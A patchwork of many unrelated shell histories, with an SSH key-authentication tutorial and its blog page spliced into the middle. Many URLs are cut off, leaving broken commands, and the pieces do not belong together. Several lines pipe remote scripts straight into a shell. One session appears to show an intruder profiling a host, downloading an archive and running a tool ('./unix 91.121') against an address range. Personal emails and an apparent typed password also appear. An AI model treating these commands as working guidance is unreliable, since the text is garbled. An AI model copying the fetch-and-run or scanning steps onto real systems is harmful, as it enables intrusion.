image +ls +ll +ls +ll +ls +ll +ls +vi Makefile +ls +rm Image +make +ls +rm Image +ls +ls +vi config +ls +laceup -w 1 /dev/hd0 +laceup /dev/hd1 wini +exit +ls +ls +cat rc +ll +df +ls +fdisk +ls +df +l +ls +ls +ll +ls +ll +exit +exit +ll +mdir b: +mcopy System.map b: +exit +dir +objdump +objdump -h /bin/vi +objdump -h /bin/vi +ll +what +wc +wcc +wgcc +wg +gcc -c -o hello.o hello.c +ll +gcc -c -o hello.o hello.c +gcc -o hello hello.o +objdump +objdump -h hello.o +objdump -h hello +objdump -h /bin/sh +objdump -hn /bin/sh +objdump -hrs /bin/sh + +objdump -hr /bin/sh +ll /bin/sh +objdump -hrnt /bin/sh + +objdump -hrnt /bin/vi +objdump -hrnt /bin/vi | more +objdump -hrnt /bin/vi | more +exit +ls +ll +ll +exit +exit +ll +ll +ll -la +ls +ll +ll +ll +ll +exit +dir +ls +ll +ll +ls +ll +ls +ll +ls +ll +make clean; make +ll +lsl +ls +sync +sync +exit +ls +ls +ll +vi profile +ls +ll +ls +ls +ll +ls +ll +cat rc +ls +ll +ls +ll +ls +ll +ls +ll +ls +ll +cat config +vi config +exit +ls +vi Makefile +ls +make clean; make +ll +ll +ls +vi Makefile +ll +vi Makefile +ll +ls +ll +ls +vi Makefile +ll +vi Makefile +vi Makefile +vi Makefile +ll +ll +ll +ls +vi Makefile +ll +ll +vi Makefile +ll +ls +make clean ;make +ll +ll +ls +ll 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init_db.py +python init_db.py +python init_db.py +ls +ls +ls +ls +source .venv/bin/activate +htop +ls +python ident.py +ls +python basis.py +ls +htop +ls +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +pip install flask-mail +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +python basis.py +ls +> __init__.py +python basis.py +> __init__.py +python basis.py +python ident.py +python ident.py +> extensions.py +vim extensions.py +rm extensions.py +ls +ls +> run.py +mkdir collazyer_backend +mv __init__.py collazyer_backend/ +mv basis.py collazyer_backend/ +mv ident.py collazyer_backend/ +ls +vim run.py +python run.py +vim run.py +python run.py +vim collazyer_backend/basis.py +vim collazyer_backend/basis.py +vim collazyer_backend/basis.py +python run.py +vim collazyer_backend/ident.py +python run.py +ls +rm __init__.py +mv basis.py __init__.py +vim __init__.py +vim run.py +python run.py +vim collazyer_backend/ident.py +mkdir views +ls +mv ident.py views/ +vim __init__.py +python run.py +vim collazyer_backend/__init__.py +python run.py +ls +python +python run.py +vim run.py +ls +vim run.py +ls +vim +vim __init__.py +vim __init__.py +ls +python run.py +ls +vim views/ident.py +python run.py +python run.py +python run.py +python run.py +python run.py +python run.py +python run.py +python run.py +python run.py +python run.py +ll +ls -la +mkdir .ssh +chmod 0700 .ssh/ +ll +vi authorized_keys +ll +vi .ssh/authorized_keys +ll +ll +chmod 0600 authorized_keys +ll +ll +git clone git://github.com/tagomoris/isucon2.git +ll +curl -kLstall.perlbrew.pl | bash +vi .bash_profile +git clone git://github.com/sstephenson/rbenv.git .rbenv +echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile +vi ~/.bash_profile +echo 'eval "$(rbenv init -)"' >> ~/.bash_profile +exec $SHELL +exit +rbenv +git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build +rbenv install +rbenv version +rbenv versions +rbenv install +date +rbenv +rbenv global +rbenv install +rbenv install -l +rbenv install 1.9.3-p327 +l +ll +rbenv list +rbenv versions +rbenv global 1.9.3-p327 +ll +perlbrew list +perlbrew +perlbrew availables +perlbrew available +perlbrew install perl-5.16.2 +less /home/homepage/perl5/perlbrew/build.perl-5.16.2.log +perlbrew availables +perlbrew install perl-5.16.2 +ll +ll +vi ~/.bashrc +vi ~/.bash_profile +mv perl5/perlbrew/ .perlbrew +ll +rm -rf perl5/ +ll +ls -la +perlbrew list +perlbrew switch perl-5.16.2 +perl -VC +perl -V +ll +perlbrew list +perlbrew switch-off +perlbrew list +perlbrew uninstall perl-5.16.2 +perlbrew list +ll +ll +perlbrew init +ll +l +ll +ll +ll +ll +ll +ll +ll +ll +ll +ll +vi my.cnf +ll +ll +ll +ll +vi common.local.json +ll +ll +ll +ll +ll +ll +ll +ll +ll +vi .ssh/authorized_keys +ll +ll +rm -rf tools/ README.md .git +ll +ll +ll +ll +mv webapp/* . +ll +rm -rf webapp/ +ll +rm -rf java/ python/ +ll +ll +ll +ll +ll +tree +ll +ll +ll +ll +ll +vi README.md +ll +l +ll +ll +vi README.md +ll +ll +vi README.md +ll +ll +ll +ll +mv isucon2/ app +ll +l +ll +ll +ll +ls -la +l +ll +perlbrew list +perlbrew install +perlbrew list +perlbrew install +perlbrew avairable +perlbrew available +perlbrew install perl-5.16.2 +less /home/homepage/.perlbrew/build.perl-5.16.2.log +ruby -v +rbenv +ll +ll +ll +vi Gemfile +gem install bundler +rbenv list +rbenv +rbenv version +rbenv versions +rbenv uninstall +rbenv uninstall 1.9.3-p327 +rbenv global +rbenv global system +rbenv global +rbenv install 1.9.3-p327 +ll +perl -V +perlbrew init +source ~/.perlbrew/etc/bashrc +perl -V +perlbrew install perl-5.16.2 +ll +rm -rf .perlbrew/ +ll +vi .bashrc +vi .bash_profile +ll +ll +env +env | sort +curl -kLstall.perlbrew.pl | bash +ll +vi .bash_profile +exec $SHELL +perlbrew list +ll +ll +l +ll +vi env.sh +ll +vi supervisord_init +ll +rm -rf supervisord_init +ll +rm -rf supervisord/ +ll +mv env.sh ~ +ll +ll +mkdir bin +mv env.sh bin/ +ll +ll +vi env.sh +ll +ll +mkdir etc/ +ll +ll +mv ~/bin/env.sh . +ll +vi env.sh +ll +vi ~/.bash_profile +vi env.sh +ll +ll +rm -rf bin/ +ll +vi app/etc/env.sh +vi ~/.bash_profile +which perlbrew +perlbrew list +perlbrew perl-5.16.2 +perlbrew install perl-5.16.2 +ll +perlbrew list +perlbrew switch perl-5.16.2 +ll +vi README.md +q +which gem +gem install bundler foreman +vi README.md +bundle install --deployment --without development +rbenv rehash +bundle install --deployment --without development +tail -f ~/.perlbrew/build.perl-5.16.2.log +bundle install --deployment --without development +ll +vi README.md +foreman start +ll +vi config.ru +vi app.rb +ll +vi ../config/common.local.json +ll +foreman start +ll +ll +mv app/etc/ . +ll +vi etc/env.sh +vi .bashrc +vi .bash_profile +ll +ll +ll +vi common.local.json +ll +vi common.production.json +ll +ll +vi initial_data.sql +ll +vi isucon2.sql +ll +vi my.cnf +ll +ll +perl -V +ll +ll +vi README.md +curl -k -Ls/ > ./cpanm +ll +curl -k -Ls/ > ./cpanm +vi README.md +./cpanm -Lextlib -n --installdeps . +less /home/homepage/.cpanm/build.log +cpan +less /home/homepage/.cpanm/build.log +cpan inc/Module/Install.pm +ll +df -h +./cpanm -Lextlib -n --installdeps . +ll +vi README.md +perl -Mlib=extlib/lib/perl5 extlib/bin/plackup -s Starman -E production --preload-app app.psgi +ls +ls +ls +ls +cp httpd.conf.sample httpd.conf +vi httpd.conf +pwd +vi httpd.conf +pwd +vi /etc/httpd/conf/httpd.conf +ls +vi httpd.conf +ls +ll +pwd +ll +ls +chmod 777 httpd.conf +ll +cp httpd.conf /etc/httpd/conf.d/ +ll +chmod 664 httpd.conf +ll +vi httpd.conf +ll +ls +ls +ls +vi index.php +ls +ls +ls +ls +ls +vi php/index.php +ls +vi conf/httpd.conf +ls +ls +cp common.local.json common.production.json +ls +ls +vi index.php +vi views/admin.html.php +vi index.php +ls +ls +vi layout.html.php +ls +ls +ll +ls +ls +ls +ls +ll +ls +ls +ISUCON_ENV=production server.js +ISUCON_ENV=production node server.js +curlster/nodebrew | perl - setup +ll +ls +curlster/nodebrew | perl - setup +vi .bashrc +source .bashrc +nodebrew ls-remote +nodebrew install v0.8.15 +ls +ls +ls +ls +ll +df -h +df +node -v +source ~/.bashrc +nodebrew alias default v0.8.15 +nodebrew use default +vi ~/.bashrc +ls +ls +ls +ls +ISUCON_ENV=production node server.js +npm install +ISUCON_ENV=production node server.js +ll +ls +ls +ll +touch README_FOR_ISUCON-GX.txt +mv README_FOR_ISUCON-GX.txt ISUCON-GX-README.txt +vi ISUCON-GX-README.txt +exit +ll +vi .bash_profile +nodebrew list +ll +vi .bash_profile +vi .bashrc +nodebrew -h +ls ~/ +ls /root/ +exit +vi ~/.bashrc +vi ~/.bash_profile +vi ~/.bashrc +vi ~/.bash_profile +vi ~/.bashrc +ll +ifconfig +w +less /proc/cpuinfo +ll +ll +ll +vi server.js +vi config.js +chkconfig --list +ll +vi /etc/hos +vi /etc/hosts +w +ww +w +lsof -i:5000 +sudo su +sudo su - +su +less .ssh/authorized_keys +echo "# it_nihongo_myrepo" >> README.md +git init +git config --global user.name "buingoctu" +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master +ls +clear +git branch +git branch -b bugFix +git branch bugFix +git branch +clear +git checkout bugFix +git config --global user.name jfmyfp123 +git config --global user.email 1565476233@qq.com +git config --global push.default matching +git config --global core.quotepath false +git config --global core.editor "vim" +ssh-keygen -t rsa -b 4096 -C "1565476233@qq.com" +cat ~/.ssh/id_rsa.pub +echo "# mytest" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add originst.git +git push -u origin master +ls +echo "anubhav" > abc4 +git add . +git commit -m "helow world" +git push origin master +l +git push origin master +sudo -i +ls +git +git init +git add +git add C:\eplcyjar\epolicyJar +git add. +git add.? +git add . +vi hosts +sudo vi hosts +ls +sudo vi hosts +ping gist.github.com +ls +sudo vi hosts +sudo vi hosts +ping gist.github.com +sudo vi hosts +curl -Lssell/oh-my-zsh/master/tools/install.sh | sh +git +curl -Lssell/oh-my-zsh/master/tools/install.sh | sh +vi .zshrc +ls +javac HelloWorld.java +ls +java -Xmx128M -Xms16M HelloWorld +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +clear +clear +ls +ls -la +ls Phone +vi ./Phone/__init__.py +ls +more __init__.py +ls -la +vi __init__.py +vi __init__.py +vi __init__.py +python main.py +python main.py +ls +ls +ls -la +rm __init__.py +ls -la +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +python main.py +ls +rm __init__py +rm __init_._py +rm __init__.py +ls +ls +python main.py +python main.py +ls +vi __init__.py +ls +ls -la +python main.py +ls +python test.py +clear +vncserver +clear +vncserver -kill :1 +sudo -i +suddo -i +sudo -i +SUDo sudo +sudo -i +clear +sudo -i +clear +sudo -i +ls -al +ls -al +who +vi userlogado.sh +vim userlogado.sh +nano userlogado.sh +nano user +cls +clear +sudo apt-get install ruby-full +irb +sudo apt-get install curl +bash < <(curl -sLsgirls/installation-scripts/master/rails-install-ubuntu.sh) +wgetsublime-text_build-3083_amd64.deb +wgetsublime-text_build-3083_amd64.deb +sudo add-apt-repository ppa:webupd8team/sublime-text-2 +$ sudo apt install git-all +sudo apt install git-all +ssh-keygen -t rsa +ssh-copy-id tomasaki@ +cat ~/.ssh/id_rsa.pub | ssh tomasaski@ "mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat + + + + +ssh-keygen +exit + + +exit + + + +ssh-keygen +ssh-copy-id tomas@remote_host +ssh-copy-id tomas@ +ssh-copy-id tomas@tomas-VirtualBox +sudo nano /etc/ssh/sshd_config +sudo apt-get update +sudo apt-get install openssh-server +sudo ufw allow 22 +ls -l ~/.ssh/id_*.pub +ssh-keygen -t rsa -b 4096 -C "tomas.orentas@gmail.com" +ls ~/.ssh/id_* +ssh-copy-id tomas@ +sudo ufw allow ssh +ssh-copy-id tomas@ +sudo sshd -T +ssh +ssh tomas@ +sudo apt-get install openssh-server +clear +sudo service ssh status +ssh localhost +clear +sudo gedit /eetcssh/sshd config +ssh-keygen +ssh-copy-id tomas@ +ssh-copy-id tomas@tomas-VirtualBox +cat ~/.ssh/id_rsa.pub | ssh username@remote_host "mkdir -p ~/.ssh && touch ~/.ssh/authorized_keys && chmod -R go= ~/.ssh && cat >> ~/.ssh/authorized_keys" +cat ~/.ssh/id_rsa.pub | ssh tomas@tomas-VirtualBox "mkdir -p ~/.ssh && touch ~/.ssh/authorized_keys && chmod -R go= ~/.ssh && cat >> ~/.ssh/authorized_keys" +cat ~/.ssh/id_rsa.pub | ssh tomas@ "mkdir -p ~/.ssh && touch ~/.ssh/authorized_keys && chmod -R go= ~/.ssh && cat >> ~/.ssh/authorized_keys" +cat ~/.ssh/id_rsa.pub | ssh tomas@tomas-VirtualBox "mkdir -p ~/.ssh && touch ~/.ssh/authorized_keys && chmod -R go= ~/.ssh && cat + +>> ~/.ssh/authorized_keys" +cat ~/.ssh/id_rsa.pub +mkdir -p ~/.ssh +echo public_key_string >> ~/.ssh/authorized_keys +chmod -R go= ~/.ssh +chown -R sammy:sammy ~/.ssh +chown -R tomas:tomas ~/.ssh +ssh tomas@tomas-VirtualBox +ssh-copy-id tomas@tomas-VirtualBox +cat ~/.ssh/id_rsa.pub +mkdir -p ~/.ssh +echo public_key_string >> ~/.ssh/authorized_keys +ssh tomas@tomas-VirtualBox +ssh tomas.orentas@gmail.com +ssh mkdir ~/.ssh && touch ~/.ssh/authorized_keys +chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys +ssh tomas@tomas-VirtualBox +mkdir ~/.ssh && touch ~/.ssh/authorized_keys +chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys +scp ~/.ssh/id_rsa.pub tomas@ +scp ~/.ssh/id_rsa.pub tomas@ +ssh tomas@tomas-VirtualBox +When you run the commands above, the out should look like the one below… +ssh-copy-id richard@ +The authenticity of host ' (' can't be established. +ECDSA key fingerprint is SHA256:GPeNZbX26TFHJ/zaqVNppD7m9pLvZ3jINahxXy226q4. +Are you sure you want to continue connecting (yes/no)? yes + +Type yes to export the key. + +After you type your SSH password for the remote host, the key should be successfully installed. + +Number of key(s) added: 1 + +Now try logging into the machine, with: "ssh 'richard@'" +and check to make sure that only the key(s) you wanted were added. + +Now your public key is stored on the remote server… + +Now when you logon to the remote server, access should be granted without you typing a password.. + +ssh richard@ +Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64) + +* Documentation: +* Management:scape.canonical.com +* Support: + +System information as of Sat Apr 28 02:50:34 UTC 2018 + +If you’re using a non Linux host or can’t use ssh-copy-id command, you can manually copy your public key and paste into the authorized_keys file on th remote host.. + +Run the commands below to display your public key… + +cat ~/.ssh/id_rsa.pub + +The output should look like the linke below.. + +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV2FxeXfKhsabnom7Esmh+r2Jf3WF+cqjv1BNXp5zdZhtiEHNT+4qJSxDyJ61DsbJOUX0MANG3geVgUVCkk/gR4hOHGBlJbuUlZRmCZVr5jNSvpBkXrB1M8WB73vwJy3cK0dMtcAQmNdKo23KYAR8/zKlv9lg4mc41qSwnhIXtrL5iyp9s+29bz84oxlsUc3+C0Y4aUWpVYNq4iH62CT0GZDC0vC8up5U/kSEkRbXjZerfnbQBYnsLb7g2SQRRUogauonCMlz1zrWMTP9EK8HdQdp7EaHcagFu3z3PQPMPaIRwJcahmAZIoNN0c2JEdg36j4RPik7CSDQVCA37IdDp richard@ubuntu1804 + +Copy the entiree key content and paste into ~/.ssh/authorized_keys file you create on the remote host.. +Step 3: Disable SSH Password Authentication + +Now that you know SSH key authentication works, you can now disable password authentication to enable enhanced SSH security… Connecto the the SSH remote host and open the configuration file by running the commands below + +sudo nano /etc/ssh/sshd_config + +Then change the line below to no + +... +# To disable tunneled clear text passwords, change to no here! +PasswordAuthentication no +... + +Save the file and exit… + +Restart SSH Server + +sudo systemctl restart ssh.service + +That’s it! + +Now only SSH clients with keys in the authorized_keys file will be allow to access the server. + +You may also like the post below: + +Setup OpenSSH Key Authentication (Passwordless) on Ubuntu 16.04 LTS Server +Setup OpenSSH Key Authentication (Passwordless) on Ubuntu 16.04 LTS Server +Setup SSH Server for Key Authentication on Ubuntu 17.04 / 17.10 +Setup SSH Server for Key Authentication on Ubuntu 17.04 / 17.10 +Lesson 41: Logon to Ubuntu via SSH Without Passwords +Lesson 41: Logon to Ubuntu via SSH Without Passwords +!robot + +This post was not written by a robot. I spend my spare time searching for ways to help students and new users get to know and understand Linux, Ubuntu, Windows, and Open Source software. ~Enjoy! +One Comment + + mostafa12/06/2018 + Reply + + thank you very much for this infos + +Add a Comment + +Your email address will not be published. Required fields are marked * + +Comment:* + +Name:* + +Email Address:* + +Save my name, email, and website in this browser for the next time I comment. + +This site uses Akismet to reduce spam. Learn how your comment data is processed. + + + +Our Popular Posts + + Install the Latest Node.js and NPM Packages on Ubuntu 16.04 / 18.04 LTS + Configure Static IP Addresses on Ubuntu 18.04 LTS Server + Connect to Ubuntu 16.04 / 17.10 / 18.04 Desktop via Remote Desktop Connection (RDP) with Xrdp + Install Proprietary Nvidia GPU Drivers on Ubuntu 16.04 / 17.10 / 18.04 + How to Install Eclipse Oxygen IDE on Ubuntu 16.04 / 17.10 / 18.04 + Enable Screen Sharing on Ubuntu 18.04 LTS Desktop via VNC from Windows Machines + WordPress 4.9.9 / 5.0.1 Security Released Available -- You Should Upgrade Immediately + Install Notepad++ on Ubuntu 16.04 / 17.10 / 18.04 via Snap + Install Adobe Flash Player on Ubuntu 18.04 LTS Desktop + + + + + +sudo servic +sudo service ssh status +sudo ssh tomas@ +sudo vi /etc/ssh/sshd_config +sudo vi /etc/ssh/sshd config +mkdir odin_on_rails +rails new my_first_rails_app +gem install rails +ghjfg + +gem install rails +exit +sudo mkdir odin_on_rails +rails new my_first_rails_app +sudo rails new_my_dirst_rails_app +sudo mu_first_rails_app +git config --global color.ui true +git config --global user.name "Tomas" +git config --global user.email "tomas.orentas@gMAIL.com" +pwd /home/tomas/odin_on_rails/my_first_rails_app +git init +git commit -m "initial commit" +git remote add originsly/Tomas.git +git remote add origin sly/Tomas.git> +git push -u origin master +git remote add originsly/Tomas.git +git push -u origin master +git checkout master +git remote add originsly/Tomas.git +git init +git remote add originsly/Tomas.git +git push -u origin master +git commit -m "initial commit" +git push origin master +git show-ref +touch README +git commit -m 'reinitialized files' +git push origin master --force +git push origin HEAD: +git commit -m "initial commit" +git push origin master +git init +git add . +git init +git add +git add . +#1549563823 +ll +#1549564281 +exit +#1551102180 +du -sch * +#1551102186 +du -sch * | sprt -h +#1551102189 +du -sch * | sort -h +#1551102197 +#1551102198 +ll +#1551102207 +du -sch * | sort -h +#1551102508 +#1551102509 +du -sch * | sort -h +#1551102653 +#1551102654 +ll +#1551102677 +cat index.php +#1551102736 +exit +hpcc +locate hpcc +cat /usr/share/doc/hpcc/README.Debian +cp /usr/share/doc/hpcc/examples/_hpccinf.txt hpccinf.txt +vi hpccinf.txt +hpcc +orterun +sudo apt-get install openmpi-bin +hpcc +cat hpccoutf.txt +sudo apt-get install mc +mcedit hpccinf.txt +mpirun -np 2 --host localhost hpcc +/sbin/ifconfig +sudo apt-get install openssh-server +su +cat /proc/version +sudo apt-get install collectd +ssh-keygen +ls +cp id_rsa.pub authorized_keys +sync +top +less hpccinf.txt +less hpccoutf.txt +less hpccinf.txt +grep N hpccoutf.txt +grep "N " hpccoutf.txt +grep "^N " hpccoutf.txt +less hpccinf.txt +less hpccoutf.txt +top +ls +vim test03.py +ls +python test03.py +pip install sllurp +exit +kayten +w +uname -a +cat /proc/cpuinfo +w +ps x +wgetservers.net/100MBtest.zip +wget +wget +tar -xzvf zH100b.tar.gz +rm -rf zH100b.tar.gz +ls -a +chmod +x * +nano data.conf +chmod +x * +./unix 91.121 +w +ps x +cat /etc/hosts +sudo shutdown -h now +ls +sudo apt-get update +sudo ntpdate pool.ntp.org +sudo apt-get install build-essential +locale +locale -a +export LANGUAGE=en_US.utf8 +locale +export LC_all=en_US.utf8 +locale +export LC_ALL=en_US.utf8 +locale +clear +locale +clear +locale +locale -a +sudo dkpg update locale +sudo dpkg-update locale +sudo dpkg update locale +sudo nano /etc/environment +sudo apt-get update +sudo apt-get install python-dev +sudo apt-get install python-setuptools +python +gcc -h +gcc --h +sudo apt-get install python-pip python-smbus +sudo apt-get install pyserial +sudo pip install pyserial +python +sudo apt-get update +2. sudo sh -c 'echo "debs.ros.org/ros/ubuntu trusty main" > /etc/apt/sources.list.d/ros-latest.list' +5. EET: wgetsercontent.com/ros/rosdistro/master/ros.key -O - | sudo apt-key add - +wgetsercontent.com/ros/rosdistro/master/ros.key -O - | sudo apt-key add - +sudo sh -c 'echo "debs.ros.org/ros/ubuntu trusty main" > /etc/apt/sources.list.d/ros-latest.list' +sudo apt-get update +sudo apt-get install ros-indigo-ros-base +rosdep +sudo apt-get install python-rosinstall +dh +df +roscore +sudo reboot +top +sudo shutdown -h now +export | grep ROS +rosws init ~/ros_workspace /opt/ros/indigo +sudo nano .bashrc +ls +ls +mkdir drone +rosws set drone +ls +ls +ls +source setup.bash +echo $ROS_PACKAGE_PATH +roscreate-pkg aristarko std_msgs rospy roscpp +ls +sudo rm -rf aristarko +ls +roscreate-pkg aristarko std_msgs rospy roscpp +ls +ls +roscd +ls +ls +ls +make +ld +ls +roscore +roscd +ls +python talker.py +ls +roscd +ls +python talker.py +ls +make +ls +./talker +roscd +ls +ls +python vn200.py +ls +ls +ls +ls +mkdir -p ~/catkin_ws/src +ls +ls +pwd +catkin_init_workspace +ls +ls +catkin_make +ls +ls +source setup.bash +echo $ROS_PACKAGE_PATH +roscd +ls +ls +catkin_create_pkg prueba std_msgs rospy roscpp +ls +ls +ls +ls +catkin_make +ls +build +ls +ls +ls +ls +ls +catkin_make +df +ls +rm -rf vectornav-master/ +ls +git clone +ls +catkin_make +ls +ls +ls +ls +ls +ls +python vn200.py +sudo shutdown -h now +roscore +roscd +ls +ls +python vn200.py +ls +ls +ls +ls +make +ls +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +top +sudo shutdown -h now +roscd +ls +sudo chmod +x listener.py +ls +python listener.py +sudo shutdown -h now +rostopic list +rostopic echo publico:ins +rostopic echo publico_ins +top +grep . -r /sys/firmware/acpi/interrupts/ +rosc +roscd +ls +python listener.py +grep . -r /sys/firmware/acpi/interrupts/ +ls +ls +roscd +ls +python listener.py +rostopic echo publico_ins +python listener.py +rostopic echo publico_ins +python listener.py +roscd +ls +python listener.py +ls +sudo chmod 666 talker +sudo chmod 666 radio.py +ls +sudo chmod 666 radio.pyls +ls +python radio.py +rostopic echo publico_ins +python radio.py +rostopic list +python radio.py +rostopic list +rostopic echo publico_insInfo +python radio.py +rosnode list +ls +python start_robot +python start_robot.py +clear +python start_robot.py +ls +ls +ls +ls +python start_robot.py +python start_robot.py +ls +ls +roscd +ls +ls +python radio.py +rosnode list +top +sudo reboot +sudo nano .bashrc +roslaunch aristarko robot.launch +sudo shutdown -h now +top +roslaunch aristarko robot.launch +top +roslaunch aristarko robot.launch +MarioJr +juninho123 +pwd +apt-get update & & appt-get-ydist-upgrade +apt-get update && appt-get-ydist-upgrade +man test +wd +home +chmod +talk +chmod +cat +wc +bin +bash +bash/bin +bin/bash +clear +clear +/home +bash/home +clear +chmod +chmod +x .trab +ls +ls -a +mkdir trabalho1 +touch trabalho1 +clear +pwd +pwd +ls +ls +ls +mkdir bin +ls +mkdir trabalho1 +ls +vim Trabalho +ls +bin +bash/bin +clear +bin bash +clear +cat +find +grep +clear +find +find +/bash +/bin +clear +ls +-l +l +-ls +clear +cat +/bin/bash +chmod +x trabalho1 +chmod +x mariojr +clear +ls +find +/trabalho1 +/.trab +clear +vi +bin/vi +bin +/bin +bash/bin +/bash/bin +find +vi +sudo su - +ls +git status +git init . +git status +git add . +git status +git commit -m "initial repo" +git config --global user.email "marcelo.gobelli@gmail.com" +git config --global user.name "decareano" +git commit -m "initial repo" +git remote add originstance-vm-test.git +git remote -v +systemctl start nginx +sudo su - +#1357279435 +qstat +#1357279440 +git status +#1357279445 +git add -u +#1357279447 +git status +#1357279452 +git commit -m "bug fix" +#1357331287 +ls +#1357331290 +screen -ls +#1357331305 +df +#1357331309 +ls +#1357331314 +screen -ls +#1357331323 +qstat +#1357331329 +screen -r 18174.PG_analysis +#1357331566 +ls +#1357331588 +#1357331588 +ls +#1357331591 +#1357331592 +ls +#1357331597 +#1357331597 +ls +#1357331601 +#1357331602 +ll +#1357331606 +ll -h +#1357331614 +#1357331629 +module load cloudbiolinux/default +#1357331636 +samtools flagstat -h +#1357331642 +samtools flagstat --help +#1357331645 +samtools flagstat +#1357331652 +samtools -h +#1357331656 +samtools --help +#1357331660 +samtools help +#1357331662 +samtools +#1357331683 +samtools flagstat +#1357331687 +samtools flagstat -h +#1357331707 +samtools view +#1357340627 +#1357340631 +#1357340632 +ls +#1357340633 +vim +#1357341064 +ls +#1357341072 +vim +#1357342462 +ls +#1357342471 +head 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+#1357775301 +sudo vim /etc/hosts.allow +#1357782515 +#1357782516 +ls +#1357782520 +sh run_queue.sh +#1357783348 +sh ./run_queue.sh +#1357783404 +ls +#1357783436 +vim +#1357786973 +clear +#1357786974 +ls +#1357787879 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar -S ../resources/gatk_queue_resources/ExampleCountReads.scala +#1357788765 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar -S ../resources/gatk_queue_resources/ExampleCountReads.scala -h +#1357789329 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar -S ../resources/gatk_repo_qscripts/examples/HelloWorld.scala -qsub +#1357789351 +cat HelloWorld.jobreport.txt +#1357789356 +cat HelloWorld.jobreport.txt -run +#1357789363 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar -S ../resources/gatk_repo_qscripts/examples/HelloWorld.scala -qsub -run +#1357789449 +ls +#1357789494 +qstat +#1357789525 +qstat -f -u "*" +#1357789577 +qstat +#1357790723 +ll +#1357790725 +ll ../ +#1357790946 +qstat +#1357792250 +which R +#1357793612 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar -help +#1357794297 +java -Djava.io.tmpdir=tmp -jar /share/ClusterShare/software/contrib/kevyin/gatk/2.2-8/gatk_queue/Queue.jar --help +#1357796805 +qstat +#1357769302 +ls +#1357769305 +screen -ls +#1357769307 +screen -r PG +#1357769315 +clear +#1357770307 +qstat +#1357771613 +#1357771614 +#1357771616 +#1357771616 +ls +#1357771994 +#1357771995 +ls +#1357771997 +bash linkme.sh +#1357771999 +ls +#1357772001 +ll +#1357772002 +ll aligned +#1357772013 +ls aligned/ +#1357772021 +rm aligned +#1357772031 +ls +#1357772034 +ln -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772037 +ls aligned +#1357772055 +ls /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned +#1357772058 +ls /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned/ +#1357772074 +ll /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned +#1357772081 +rm /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned/aligned +#1357772094 +ls +#1357772098 +ll +#1357772100 +rm aligned +#1357772100 +ls +#1357772102 +ln -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772104 +ls aligned +#1357772109 +sh ~/dev/sunny/largest_dirs.sh +#1357772114 +sh linkme.sh +#1357772213 +man ln +#1357772241 +ls +#1357772244 +ls resources/ +#1357772250 +ls resources/gatk_repo-qscripts +#1357772269 +ln -s ~/dev/gatk-public/gatk/public/scala/qscript/org/broadinstitute/sting/queue/qscripts/ gatk_repo-qscripts +#1357772271 +ls resources/gatk_repo-qscripts +#1357772275 +ls +#1357772279 +ls gatk_repo-qscripts +#1357772431 +man curl +#1357772583 +ls +#1357772598 +ln -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772599 +ls +#1357772601 +ls aligned +#1357772607 +ln -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772609 +ls aligned +#1357772613 +rm aligned +#1357772619 +ln -s /misc/FacilityBioinformatics/private/Illumina_HiSeq_2000_Runfolder/PG0002526-DNA_analysis/aligned aligned +#1357772621 